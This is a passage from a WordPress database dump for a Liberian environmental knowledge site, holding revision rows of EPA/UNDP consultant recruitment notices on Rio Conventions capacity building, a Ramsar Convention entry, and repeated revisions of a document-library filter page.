noreferrer\">EPA Seeks Local Consultant to Prepare Lessons Learned</a></em>','REFRENCE NO: TOR/CCCD/EPA-2021-002, Prepare Lessons Learned Study on the Use of the EKMS to Mainstream Rio Convention Obligations Into Sectoral Plans and Policies','','inherit','closed','closed','','3674-revision-v1','','','2021-08-19 08:57:09','2021-08-19 08:57:09','',3674,'https://ekmsliberia.info/?p=4168',0,'revision','',0),(4169,42,'2021-08-19 08:58:04','2021-08-19 08:58:04','The EPA and the UNDP through the Cross-Cutting Capacity Development Project intends to recruit the service of a\r\nNational Consultant, to: Prepare a training Programme and curriculum for the use of the EKMS. This project is in line\r\nwith the GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs\r\ninto management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and\r\nregulatory frameworks, and c) update NCSAs, respectively.\r\n\r\nLink: <em><a href=\"https://ekmsliberia.info/wp-content/uploads/2021/04/FINAL-DRAFT-EKMS-CURRICULUM-MARCH-19-2021-CCCD.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">EPA Seeks Local Consultant to Prepare a Training Programme and Curriculum</a></em>','REFRENCE NO: TOR/CCCD/EPA-2021-003, Prepare a Training Programme and Curriculum for The Use of The EKMS Post Project Trainings','','inherit','closed','closed','','3673-revision-v1','','','2021-08-19 08:58:04','2021-08-19 08:58:04','',3673,'https://ekmsliberia.info/?p=4169',0,'revision','',0),(4170,42,'2021-08-19 08:59:37','2021-08-19 08:59:37','The UNDP through the EPA as Implementing Entity (IE) intends to recruit the service of a <strong>National Consultant, </strong>to design and carry out a survey to assess public awareness of the importance of the Rio Conventions to catalyzing sustainable development<strong>.  </strong>. This project is in line with the GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.  The goal of this project is for Liberia to make better decisions to meet and sustain global environmental obligations.  This requires the country to have the capacity to coordinate efforts, as well as best practices for integrating global environmental priorities into planning, decision-making, and reporting processes.  To this end, the objective of this project is to strengthen a targeted set of national capacities to deliver and sustain global environmental outcomes within the framework of sustainable development priorities.\r\n\r\n*Note* The closing date has been extended to 4PM, November 3<sup>rd</sup>, 2020.\r\n\r\nLink: <a href=\"http://epa.gov.lr/sites/default/files/Consultant%20CCCD%204.pdf\"><em>Design and Carry Out a Survey to Assess Public Awareness</em></a>','REFRENCE NO: TOR/CCCD/EPA-2020-010, Design and Carry Out a Survey to Assess Public Awareness of the Importance of the Rio Conventions','','inherit','closed','closed','','3181-revision-v1','','','2021-08-19 08:59:37','2021-08-19 08:59:37','',3181,'https://ekmsliberia.info/?p=4170',0,'revision','',0),(4171,42,'2021-08-19 09:00:23','2021-08-19 09:00:23','The UNDP through the EPA as Implementing Entity (IE) intends to recruit the service of a <strong>National Consultant, </strong>to <em>Assess and draft Environmental Guidelines for coordinated compliance, Monitoring and Reporting.</em> This project is in line with the GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.  The goal of this project is for Liberia to make better decisions to meet and sustain global environmental obligations.  This requires the country to have the capacity to coordinate efforts, as well as best practices for integrating global environmental priorities into planning, decision-making, and reporting processes.  To this end, the objective of this project is to strengthen a targeted set of national capacities to deliver and sustain global environmental outcomes within the framework of sustainable development priorities.\r\n\r\n*Note* The closing date has been extended to 4PM, November 3<sup>rd</sup>, 2020.\r\n\r\nLink: <a href=\"http://epa.gov.lr/sites/default/files/National%20Consultant%20CCCD3.pdf\"><em>Assess and Draft Environmental Guidelines</em></a>','REFRENCE NO: TOR/CCCD/EPA-2020-009, Assess and Draft Environmental Guidelines','','inherit','closed','closed','','3180-revision-v1','','','2021-08-19 09:00:23','2021-08-19 09:00:23','',3180,'https://ekmsliberia.info/?p=4171',0,'revision','',0),(4172,42,'2021-08-19 09:01:08','2021-08-19 09:01:08','The UNDP through the EPA as Implementing Entity (IE) intends to recruit the service of a <strong>National Consultant, </strong>to <em>Develop an applicable awareness module for institutions on Rio Conventions mainstreaming, monitoring and evaluation.</em> This project is in line with the GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.  The goal of this project is for Liberia to make better decisions to meet and sustain global environmental obligations.  This requires the country to have the capacity to coordinate efforts, as well as best practices for integrating global environmental priorities into planning, decision-making, and reporting processes.  To this end, the objective of this project is to strengthen a targeted set of national capacities to deliver and sustain global environmental outcomes within the framework of sustainable development priorities.\r\n\r\n*Note* The closing date has been extended to 4PM, November 3<sup>rd</sup>, 2020.\r\n\r\nLink: <a href=\"http://www.epa.gov.lr/sites/default/files/National%20Consultant%20CCCD%202.pdf\" target=\"_blank\" rel=\"noopener noreferrer\"><em>Develop an Awareness Module for Institutions on Rio Conventions Mainstreaming</em></a>','REFRENCE NO: TOR/CCCD/EPA-2020-007, Develop an Awareness Module for Institutions on Rio Conventions Mainstreaming, Monitoring and Evaluation','','inherit','closed','closed','','3178-revision-v1','','','2021-08-19 09:01:08','2021-08-19 09:01:08','',3178,'https://ekmsliberia.info/?p=4172',0,'revision','',0),(4173,42,'2021-08-19 09:02:37','2021-08-19 09:02:37','The UNDP through the EPA as Implementing Entity (IE) intends to recruit the service of a <strong>National Consultant, </strong><strong>to </strong><em>Prepare and validate the methodology to update the NCSA and integrate the post-2015 SDGs</em>. This project is in line with the GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.  The goal of this project is for Liberia to make better decisions to meet and sustain global environmental obligations.  This requires the country to have the capacity to coordinate efforts, as well as best practices for integrating global environmental priorities into planning, decision-making, and reporting processes.  To this end, the objective of this project is to strengthen a targeted set of national capacities to deliver and sustain global environmental outcomes within the framework of sustainable development priorities.\r\n\r\n*Note* The closing date has been extended to 4PM, November 3<sup>rd</sup>, 2020.\r\n\r\nLink: <a href=\"http://www.epa.gov.lr/sites/default/files/National%20Consultant%20CCCD.pdf\" target=\"_blank\" rel=\"noopener noreferrer\"><em>Prepare and Validate the Methodology to Update the NCSA and Integrate the Post-2015 SDGs</em></a>','REFRENCE NO: TOR/CCCD/EPA-2020-006, Prepare and Validate the Methodology to Update the NCSA and Integrate the Post-2015 SDGs.','','inherit','closed','closed','','3175-revision-v1','','','2021-08-19 09:02:37','2021-08-19 09:02:37','',3175,'https://ekmsliberia.info/?p=4173',0,'revision','',0),(4174,42,'2021-08-19 09:09:37','2021-08-19 09:09:37','The UNDP through the EPA as Implementing Entity (IE) intends to recruit the service of a <strong>Local Consultant Firm, </strong>who will produce and air Public service announcement(s)/jingle on globally sensitive and environmentally friendly<strong> behavior</strong>. This project is in line with the GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.  The goal of this project is for Liberia to make better decisions to meet and sustain global environmental obligations.  This requires the country to have the capacity to coordinate efforts, as well as best practices for integrating global environmental priorities into planning, decision-making, and reporting processes.  To this end, the objective of this project is to strengthen a targeted set of national capacities to deliver and sustain global environmental outcomes within the framework of sustainable development priorities.\n\n<a href=\"http://www.epa.gov.lr/sites/default/files/Linkages%20Rio%20Conventions.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">http://www.epa.gov.lr/sites/default/files/Linkages%20Rio%20Conventions.pdf</a>','REFRENCE NO. TOR/CCCD/EPA-2020-001 EPA, UNDP Recruiting Consultant to Produce and Air Jingles','','inherit','closed','closed','','3058-autosave-v1','','','2021-08-19 09:09:37','2021-08-19 09:09:37','',3058,'https://ekmsliberia.info/?p=4174',0,'revision','',0),(4175,42,'2021-08-19 09:05:42','2021-08-19 09:05:42','The UNDP through the EPA as Implementing Entity (IE) intends to recruit the service of a <strong>Local Consultant Firm, </strong>who will produce and air Public service announcement(s)/jingle on globally sensitive and environmentally friendly<strong> behavior</strong>. This project is in line with the GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.  The goal of this project is for Liberia to make better decisions to meet and sustain global environmental obligations.  This requires the country to have the capacity to coordinate efforts, as well as best practices for integrating global environmental priorities into planning, decision-making, and reporting processes.  To this end, the objective of this project is to strengthen a targeted set of national capacities to deliver and sustain global environmental outcomes within the framework of sustainable development priorities.\r\n\r\n<a href=\"http://www.epa.gov.lr/sites/default/files/Linkages%20Rio%20Conventions.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">http://www.epa.gov.lr/sites/default/files/Linkages%20Rio%20Conventions.pdf</a>','REFRENCE NO. TOR/CCCD/EPA-2020-001 EPA, UNDP Recruiting Consultant to Prepare and Publish Articles on the Socio-Economic Linkages','','inherit','closed','closed','','3058-revision-v1','','','2021-08-19 09:05:42','2021-08-19 09:05:42','',3058,'https://ekmsliberia.info/?p=4175',0,'revision','',0),(4176,42,'2021-08-19 09:12:00','2021-08-19 09:12:00','The UNDP through the EPA as Implementing Entity (IE) intends to recruit the service of a <strong>Local Consultant, </strong>who will <strong>Produce articles on the socio-economic linkages on the thematic areas of the Rio Conventions</strong>. This project is in line with the GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.  The goal of this project is for Liberia to make better decisions to meet and sustain global environmental obligations.  This requires the country to have the capacity to coordinate efforts, as well as best practices for integrating global environmental priorities into planning, decision-making, and reporting processes.  To this end, the objective of this project is to strengthen a targeted set of national capacities to deliver and sustain global environmental outcomes within the framework of sustainable development priorities.\r\n\r\n<a href=\"http://www.epa.gov.lr/sites/default/files/Linkages%20Rio%20Conventions.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">http://www.epa.gov.lr/sites/default/files/Linkages%20Rio%20Conventions.pdf</a>','REFERENCE NO:TOR/ CCCD/EPA-2020-002  EPA, UNDP In Search of Consultant to Produce and Publish Articles','','inherit','closed','closed','','3056-revision-v1','','','2021-08-19 09:12:00','2021-08-19 09:12:00','',3056,'https://ekmsliberia.info/?p=4176',0,'revision','',0),(4177,42,'2021-08-19 09:12:31','2021-08-19 09:12:31','The UNDP through the EPA as Implementing Entity (IE) intends to recruit the service of a <strong>Local Consultant Firm, </strong>who will produce and air Public service announcement(s)/jingle on globally sensitive and environmentally friendly<strong> behavior</strong>. This project is in line with the GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.  The goal of this project is for Liberia to make better decisions to meet and sustain global environmental obligations.  This requires the country to have the capacity to coordinate efforts, as well as best practices for integrating global environmental priorities into planning, decision-making, and reporting processes.  To this end, the objective of this project is to strengthen a targeted set of national capacities to deliver and sustain global environmental outcomes within the framework of sustainable development priorities.\r\n\r\n<a href=\"http://www.epa.gov.lr/sites/default/files/Linkages%20Rio%20Conventions.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">http://www.epa.gov.lr/sites/default/files/Linkages%20Rio%20Conventions.pdf</a>','REFRENCE NO. TOR/CCCD/EPA-2020-001 EPA, UNDP Recruiting Consultant to Produce and Air Jingles','','inherit','closed','closed','','3058-revision-v1','','','2021-08-19 09:12:31','2021-08-19 09:12:31','',3058,'https://ekmsliberia.info/?p=4177',0,'revision','',0),(4178,42,'2021-08-19 09:13:42','2021-08-19 09:13:42','The UNDP through the EPA as Implementing Entity (IE) intends to recruit the service of a <strong>Local Consultant, </strong>who will produce and distribute of updated codes pertaining to Rio Conventions. This project is in line with the GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.  The goal of this project is for Liberia to make better decisions to meet and sustain global environmental obligations.  This requires the country to have the capacity to coordinate efforts, as well as best practices for integrating global environmental priorities into planning, decision-making, and reporting processes.  To this end, the objective of this project is to strengthen a targeted set of national capacities to deliver and sustain global environmental outcomes within the framework of sustainable development priorities.\n\nLink:  <a href=\"http://www.epa.gov.lr/sites/default/files/Production%20of%20updated%20codes.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">http://www.epa.gov.lr/sites/default/files/Production%20of%20updated%20codes.pdf</a>','REFRENCE NO: TOR/CCCD/EPA-2020-003 Production and Distribution of Updated Codes Pertaining to Rio Conventions','','inherit','closed','closed','','3055-autosave-v1','','','2021-08-19 09:13:42','2021-08-19 09:13:42','',3055,'https://ekmsliberia.info/?p=4178',0,'revision','',0),(4179,42,'2021-08-19 09:14:29','2021-08-19 09:14:29','The UNDP through the EPA as Implementing Entity (IE) intends to recruit the service of a <strong>Local Consultant, </strong>who will produce and distribute of updated codes pertaining to Rio Conventions. This project is in line with the GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.  The goal of this project is for Liberia to make better decisions to meet and sustain global environmental obligations.  This requires the country to have the capacity to coordinate efforts, as well as best practices for integrating global environmental priorities into planning, decision-making, and reporting processes.  To this end, the objective of this project is to strengthen a targeted set of national capacities to deliver and sustain global environmental outcomes within the framework of sustainable development priorities.\r\n\r\nLink:  <a href=\"http://www.epa.gov.lr/sites/default/files/Production%20of%20updated%20codes.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">http://www.epa.gov.lr/sites/default/files/Production%20of%20updated%20codes.pdf</a>','REFRENCE NO: TOR/CCCD/EPA-2020-003 Production and Distribution of Updated Codes Pertaining to Rio Conventions','','inherit','closed','closed','','3055-revision-v1','','','2021-08-19 09:14:29','2021-08-19 09:14:29','',3055,'https://ekmsliberia.info/?p=4179',0,'revision','',0),(4184,43,'2021-08-19 12:10:11','2021-08-19 12:10:11','An intergovernmental treaty for the protection and sustainable use of wetlands in general and Ramsar Sites in particular','The RAMSAR Convention','','inherit','closed','closed','','3271-revision-v1','','','2021-08-19 12:10:11','2021-08-19 12:10:11','',3271,'https://ekmsliberia.info/?p=4184',0,'revision','',0),(4185,43,'2021-08-19 12:15:44','2021-08-19 12:15:44','','Document-loop','','inherit','closed','closed','','3834-revision-v1','','','2021-08-19 12:15:44','2021-08-19 12:15:44','',3834,'https://ekmsliberia.info/?p=4185',0,'revision','',0),(4187,43,'2021-08-19 12:25:54','2021-08-19 12:25:54','<h2>Access environmental reports, publications, policies and other related documents</h2>		\n			Search\n		<input\n			class=\"jet-search-filter__input\"\n			type=\"search\"\n			autocomplete=\"off\"\n			name=\"query\"\n			value=\"\"\n			placeholder=\"Search...\"\n		>\n			Filter by Category\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"76\"\n			data-label=\"Case Studies\"\n					>\n						Case Studies\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"78\"\n			data-label=\"Conventions\"\n					>\n						Conventions\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"79\"\n			data-label=\"Factsheets\"\n					>\n						Factsheets\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"161\"\n			data-label=\"Guidelines\"\n					>\n						Guidelines\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"82\"\n			data-label=\"Leaflets\"\n					>\n						Leaflets\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"84\"\n			data-label=\"Newsletters\"\n					>\n						Newsletters\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"85\"\n			data-label=\"Policies\"\n					>\n						Policies\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"225\"\n			data-label=\"Presentations\"\n					>\n						Presentations\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"209\"\n			data-label=\"Project Document\"\n					>\n						Project Document\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"86\"\n			data-label=\"Reports\"\n					>\n						Reports\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"178\"\n			data-label=\"Research\"\n					>\n						Research\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"88\"\n			data-label=\"Strategy and Action Plans\"\n					>\n						Strategy and Action Plans\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"89\"\n			data-label=\"Toolkits\"\n					>\n						Toolkits\n	</label>','Document Library','','inherit','closed','closed','','91-revision-v1','','','2021-08-19 12:25:54','2021-08-19 12:25:54','',91,'https://ekmsliberia.info/?p=4187',0,'revision','',0),(4188,43,'2021-08-19 12:25:54','2021-08-19 12:25:54','<h2>Access environmental reports, publications, policies and other related documents</h2>		\n			Search\n		<input\n			class=\"jet-search-filter__input\"\n			type=\"search\"\n			autocomplete=\"off\"\n			name=\"query\"\n			value=\"\"\n			placeholder=\"Search...\"\n		>\n			Filter by Category\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"76\"\n			data-label=\"Case Studies\"\n					>\n						Case Studies\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"78\"\n			data-label=\"Conventions\"\n					>\n						Conventions\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"79\"\n			data-label=\"Factsheets\"\n					>\n						Factsheets\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"161\"\n			data-label=\"Guidelines\"\n					>\n						Guidelines\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"82\"\n			data-label=\"Leaflets\"\n					>\n						Leaflets\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"84\"\n			data-label=\"Newsletters\"\n					>\n						Newsletters\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"85\"\n			data-label=\"Policies\"\n					>\n						Policies\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"225\"\n			data-label=\"Presentations\"\n					>\n						Presentations\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"209\"\n			data-label=\"Project Document\"\n					>\n						Project Document\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"86\"\n			data-label=\"Reports\"\n					>\n						Reports\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"178\"\n			data-label=\"Research\"\n					>\n						Research\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"88\"\n			data-label=\"Strategy and Action Plans\"\n					>\n						Strategy and Action Plans\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"89\"\n			data-label=\"Toolkits\"\n					>\n						Toolkits\n	</label>','Document Library','','inherit','closed','closed','','91-revision-v1','','','2021-08-19 12:25:54','2021-08-19 12:25:54','',91,'https://ekmsliberia.info/?p=4188',0,'revision','',0),(4189,43,'2021-08-19 12:25:54','2021-08-19 12:25:54','<h2>Access environmental reports, publications, policies and other related documents</h2>		\n			Search\n		<input\n			class=\"jet-search-filter__input\"\n			type=\"search\"\n			autocomplete=\"off\"\n			name=\"query\"\n			value=\"\"\n			placeholder=\"Search...\"\n		>\n			Filter by Category\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"76\"\n			data-label=\"Case Studies\"\n					>\n						Case Studies\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"78\"\n			data-label=\"Conventions\"\n					>\n						Conventions\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"79\"\n			data-label=\"Factsheets\"\n					>\n						Factsheets\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"161\"\n			data-label=\"Guidelines\"\n					>\n						Guidelines\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"82\"\n			data-label=\"Leaflets\"\n					>\n						Leaflets\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"84\"\n			data-label=\"Newsletters\"\n					>\n						Newsletters\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"85\"\n			data-label=\"Policies\"\n					>\n						Policies\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"225\"\n			data-label=\"Presentations\"\n					>\n						Presentations\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"209\"\n			data-label=\"Project Document\"\n					>\n						Project Document\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"86\"\n			data-label=\"Reports\"\n					>\n						Reports\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"178\"\n			data-label=\"Research\"\n					>\n						Research\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"88\"\n			data-label=\"Strategy and Action Plans\"\n					>\n						Strategy and Action Plans\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"89\"\n			data-label=\"Toolkits\"\n					>\n						Toolkits\n	</label>','Document Library','','inherit','closed','closed','','91-revision-v1','','','2021-08-19 12:25:54','2021-08-19 12:25:54','',91,'https://ekmsliberia.info/?p=4189',0,'revision','',0),(4190,43,'2021-08-19 12:26:41','2021-08-19 12:26:41','<h2>Access environmental reports, publications, policies and other related documents</h2>		\n			Search\n		<input\n			class=\"jet-search-filter__input\"\n			type=\"search\"\n			autocomplete=\"off\"\n			name=\"query\"\n			value=\"\"\n			placeholder=\"Search...\"\n		>\n			Filter by Category\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"76\"\n			data-label=\"Case Studies\"\n					>\n						Case Studies\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"78\"\n			data-label=\"Conventions\"\n					>\n						Conventions\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"79\"\n			data-label=\"Factsheets\"\n					>\n						Factsheets\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"161\"\n			data-label=\"Guidelines\"\n					>\n						Guidelines\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"82\"\n			data-label=\"Leaflets\"\n					>\n						Leaflets\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"84\"\n			data-label=\"Newsletters\"\n					>\n						Newsletters\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"85\"\n			data-label=\"Policies\"\n					>\n						Policies\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"225\"\n			data-label=\"Presentations\"\n					>\n						Presentations\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"209\"\n			data-label=\"Project Document\"\n					>\n						Project Document\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"86\"\n			data-label=\"Reports\"\n					>\n						Reports\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"178\"\n			data-label=\"Research\"\n					>\n						Research\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"88\"\n			data-label=\"Strategy and Action Plans\"\n					>\n						Strategy and Action Plans\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"89\"\n			data-label=\"Toolkits\"\n					>\n						Toolkits\n	</label>','Document Library','','inherit','closed','closed','','91-revision-v1','','','2021-08-19 12:26:41','2021-08-19 12:26:41','',91,'https://ekmsliberia.info/?p=4190',0,'revision','',0),(4191,43,'2021-08-19 12:26:41','2021-08-19 12:26:41','<h2>Access environmental reports, publications, policies and other related documents</h2>		\n			Search\n		<input\n			class=\"jet-search-filter__input\"\n			type=\"search\"\n			autocomplete=\"off\"\n			name=\"query\"\n			value=\"\"\n			placeholder=\"Search...\"\n		>\n			Filter by Category\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"76\"\n			data-label=\"Case Studies\"\n					>\n						Case Studies\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"78\"\n			data-label=\"Conventions\"\n					>\n						Conventions\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"79\"\n			data-label=\"Factsheets\"\n					>\n						Factsheets\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"161\"\n			data-label=\"Guidelines\"\n					>\n						Guidelines\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"82\"\n			data-label=\"Leaflets\"\n					>\n						Leaflets\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"84\"\n			data-label=\"Newsletters\"\n					>\n						Newsletters\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"85\"\n			data-label=\"Policies\"\n					>\n						Policies\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"225\"\n			data-label=\"Presentations\"\n					>\n						Presentations\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"209\"\n			data-label=\"Project Document\"\n					>\n						Project Document\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"86\"\n			data-label=\"Reports\"\n					>\n						Reports\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"178\"\n			data-label=\"Research\"\n					>\n						Research\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			